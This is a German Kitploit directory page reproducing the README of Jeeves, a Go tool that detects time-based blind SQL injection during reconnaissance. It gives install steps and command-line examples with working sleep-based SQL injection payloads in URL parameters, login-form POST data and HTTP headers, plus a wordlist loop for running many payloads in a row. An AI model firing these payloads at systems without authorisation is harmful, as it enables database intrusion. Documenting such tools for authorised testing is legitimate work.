Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Jeeves — Zeitbasiertes Blind-SQL-Injection-Erkennungstool für Recon und Bug Bounty. Akzeptiert einzelne URLs oder Listen, unterstützt benutzerdefinierte Header, Proxy und POST-Daten für automatisiertes Schwachstellenscanning. | Kitploit
Tools/GitHubGitHub/ferreiraklet/jeeves
SchwachstellenscannerWebsicherheitPenetrationstests
GitHubferreiraklet/jeeves

Jeeves

Zeitbasiertes Blind-SQL-Injection-Erkennungstool für Recon und Bug Bounty. Akzeptiert einzelne URLs oder Listen, unterstützt benutzerdefinierte Header, Proxy und POST-Daten für automatisiertes Schwachstellenscanning.

Repository anzeigen
2155044vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

made-with-Go

Jeeves


Nutzung • Installation

Jeeves wurde für die Suche nach zeitbasierter Blind-SQL-Injection während der Reconnaissance entwickelt.

Inhaltsverzeichnis:

  • Installation
  • Nutzung
    • Header hinzufügen
    • Proxy verwenden
    • POST-Anfrage stellen
    • Weitere Nutzungsmöglichkeiten

- Installation & Voraussetzungen:

Jeeves installieren 💀

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

ODER

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Nutzung & Erklärung:

Während deines Recon-Prozesses kannst du auf Endpunkte stoßen, die anfällig für SQL-Injection sein könnten, z. B.: https://redacted.com/index.php?id=1

Einzelne URLs

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

In --payload-time musst du die im Payload angegebene Zeit verwenden.


Aus einer Liste

cat targets | jeeves --payload-time 5

Header hinzufügen

Achte auf die Syntax! Sie muss genau so sein =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Proxy verwenden

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Header =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

POST-Anfrage

Senden von Daten über POST-Anfrage (Login-Formulare usw.)

Achte auf die Syntax! Sie muss identisch sein! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Weitere Nutzungsmöglichkeiten

Du kannst Jeeves mit anderen Tools wie gau, gauplus, waybackurls, qsreplace und bhedak verwenden, um seine Stärken voll auszuschöpfen.


Befehlszeilen-Flags:

root@kitploit:~
 Usage:
 -t, --payload-time,  The time from payload
 -p, --proxy          Send traffic to a proxy
 -c                   Set Concurrency, Default 25
 -H, --headers        Custom Headers
 -d, --data           Sending Post request with data
 -h                   Show This Help Message

Verwendung mit einer SQL-Payload-Wortliste

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Testen in Headern

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

Anmerkung:

  • Folgt keinen Weiterleitungen. Wenn der Statuscode nicht 200 ist, wird „Need Manual Analisys“ zurückgegeben.
  • Jeeves führt kein HTTP-Probing durch; er kann keine Anfragen an URLs ohne Protokoll (http://, https://) stellen.

Dieses Projekt dient ausschließlich zu Bildungs- und Bug-Bounty-Zwecken! Ich unterstütze keine illegalen Aktivitäten!

Sollte ein Fehler im Programm auftreten, kontaktiere mich umgehend.

Bitte schau dir auch Folgendes an =>

Nilo – Prüft, ob eine URL den Status 200 zurückgibt

SQLMAP

Blisqy – Zeitbasierte SQLI in Headern

Tool herunterladen